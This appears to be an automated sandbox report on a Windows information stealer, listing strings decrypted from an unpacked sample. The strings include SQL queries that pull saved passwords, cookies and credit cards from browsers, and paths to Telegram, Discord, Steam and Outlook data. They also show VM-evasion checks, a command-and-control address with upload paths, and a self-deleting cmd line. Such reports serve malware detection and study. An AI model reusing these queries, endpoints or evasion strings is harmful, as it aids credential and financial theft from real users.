Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: CreateEventA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: CloseHandle
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: Sleep
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GetUserDefaultLangID
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: VirtualAllocExNuma
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: VirtualFree
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GetSystemInfo
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: VirtualAlloc
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: HeapAlloc
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GetComputerNameA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: lstrcpyA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GetProcessHeap
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GetCurrentProcess
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: lstrlenA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: ExitProcess
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GlobalMemoryStatusEx
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GetSystemTime
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: SystemTimeToFileTime
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: advapi32.dll
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: gdi32.dll
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: user32.dll
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: crypt32.dll
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: ntdll.dll
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GetUserNameA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: CreateDCA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GetDeviceCaps
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: ReleaseDC
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: CryptStringToBinaryA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: sscanf
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: VMwareVMware
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: HAL9TH
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: JohnDoe
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: DISPLAY
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: %hu/%hu/%hu
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: http://185.215.113.206
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: bksvnsj
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: /6c4adf523b719729.php
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: /746f34465cf17784/
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: tale
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GetEnvironmentVariableA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GetFileAttributesA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GlobalLock
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: HeapFree
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GetFileSize
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GlobalSize
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: IsWow64Process
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: Process32Next
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GetLocalTime
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: FreeLibrary
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GetTimeZoneInformation
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GetSystemPowerStatus
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GetVolumeInformationA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GetWindowsDirectoryA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: Process32First
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GetLocaleInfoA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GetUserDefaultLocaleName
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GetModuleFileNameA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: DeleteFileA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: FindNextFileA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: LocalFree
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: FindClose
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: SetEnvironmentVariableA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: LocalAlloc
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GetFileSizeEx
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: ReadFile
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: SetFilePointer
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: WriteFile
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: CreateFileA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: FindFirstFileA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: CopyFileA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: VirtualProtect
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GetLastError
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: lstrcpynA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: MultiByteToWideChar
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GlobalFree
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: WideCharToMultiByte
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GlobalAlloc
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: OpenProcess
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: TerminateProcess
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GetCurrentProcessId
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: gdiplus.dll
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: ole32.dll
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: bcrypt.dll
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: wininet.dll
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: shlwapi.dll
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: shell32.dll
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: psapi.dll
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: rstrtmgr.dll
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: CreateCompatibleBitmap
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: SelectObject
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: BitBlt
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: DeleteObject
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: CreateCompatibleDC
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GdipGetImageEncodersSize
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GdipGetImageEncoders
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GdiplusStartup
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GdiplusShutdown
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GdipSaveImageToStream
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GdipDisposeImage
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GdipFree
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GetHGlobalFromStream
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: CreateStreamOnHGlobal
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: CoUninitialize
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: CoInitialize
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: CoCreateInstance
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: BCryptDecrypt
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: BCryptSetProperty
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: BCryptDestroyKey
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GetWindowRect
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GetDesktopWindow
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GetDC
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: CloseWindow
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: wsprintfA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: EnumDisplayDevicesA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GetKeyboardLayoutList
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: CharToOemW
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: wsprintfW
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: RegQueryValueExA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: RegEnumKeyExA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: RegOpenKeyExA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: RegCloseKey
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: RegEnumValueA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: CryptBinaryToStringA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: CryptUnprotectData
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: SHGetFolderPathA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: ShellExecuteExA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: InternetOpenUrlA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: InternetConnectA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: InternetCloseHandle
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: InternetOpenA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: HttpSendRequestA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: HttpOpenRequestA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: InternetReadFile
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: InternetCrackUrlA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: StrCmpCA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: StrStrA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: StrCmpCW
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: PathMatchSpecA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: GetModuleFileNameExA
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: RmStartSession
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: RmRegisterResources
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: RmGetList
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: RmEndSession
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: sqlite3_open
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: sqlite3_prepare_v2
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: sqlite3_step
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: sqlite3_column_text
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: sqlite3_finalize
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: sqlite3_close
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: sqlite3_column_bytes
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: sqlite3_column_blob
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: encrypted_key
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: PATH
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: NSS_Init
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: NSS_Shutdown
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: PK11_FreeSlot
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: PK11_Authenticate
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: PK11SDR_Decrypt
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: C:\ProgramData\
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: browser:
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: profile:
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: url:
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: login:
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: password:
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: Opera
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: OperaGX
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: Network
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: cookies
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: .txt
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: TRUE
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: FALSE
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: autofill
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: SELECT name, value FROM autofill
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: history
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: cc
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: name:
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: month:
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: year:
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: card:
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: Cookies
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: Login Data
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: Web Data
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: History
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: logins.json
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: formSubmitURL
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: usernameField
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: encryptedUsername
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: encryptedPassword
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: guid
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: cookies.sqlite
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: formhistory.sqlite
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: places.sqlite
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: plugins
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: Local Extension Settings
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: Sync Extension Settings
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: IndexedDB
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: Opera Stable
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: Opera GX Stable
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: CURRENT
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: chrome-extension_
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: _0.indexeddb.leveldb
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: Local State
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: profiles.ini
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: chrome
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: opera
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: firefox
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: wallets
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: %08lX%04lX%lu
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: ProductName
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: x32
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: x64
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: ProcessorNameString
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: DisplayName
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: DisplayVersion
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: Network Info:
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: - IP: IP?
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: - Country: ISO?
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: System Summary:
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: - HWID:
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: - OS:
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: - Architecture:
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: - UserName:
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: - Computer Name:
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: - Local Time:
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: - UTC:
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: - Language:
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: - Keyboards:
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: - Laptop:
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: - Running Path:
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: - CPU:
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: - Threads:
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: - Cores:
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: - RAM:
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: - Display Resolution:
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: - GPU:
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: User Agents:
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: Installed Apps:
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: All Users:
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: Current User:
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: Process List:
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: system_info.txt
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: freebl3.dll
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: mozglue.dll
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: msvcp140.dll
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: nss3.dll
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: softokn3.dll
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: vcruntime140.dll
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: \Temp\
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: .exe
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: runas
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: open
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: /c start
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: %DESKTOP%
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: %APPDATA%
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: %LOCALAPPDATA%
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: %USERPROFILE%
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: %DOCUMENTS%
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: %PROGRAMFILES%
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: %PROGRAMFILES_86%
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: %RECENT%
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: *.lnk
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: files
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: \discord\
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: \Local Storage\leveldb
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: \Telegram Desktop\
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: key_datas
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: D877F783D5D3EF8C*
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: map*
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: A7FDF864FBC10B77*
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: F8806DD0C461824F*
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: Telegram
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: Tox
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: *.tox
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: *.ini
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: Password
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: 00000001
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: 00000002
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: 00000003
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: 00000004
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: \Outlook\accounts.txt
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: Pidgin
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: \.purple\
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: accounts.xml
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: dQw4w9WgXcQ
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: token:
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: Software\Valve\Steam
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: SteamPath
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: \config\
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: ssfn*
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: config.vdf
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: DialogConfig.vdf
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: libraryfolders.vdf
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: loginusers.vdf
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: \Steam\
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: sqlite3.dll
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: browsers
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: done
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: soft
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: \Discord\tokens.txt
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: https
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: POST
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: HTTP/1.1
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: hwid
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: build
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: token
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: file_name
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: file
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: message
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 75.2.0717674af5.exe.c90000.0.unpack	String decryptor: screenshot.jpg

Source: lIocM276SA.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49737 version: TLS 1.2
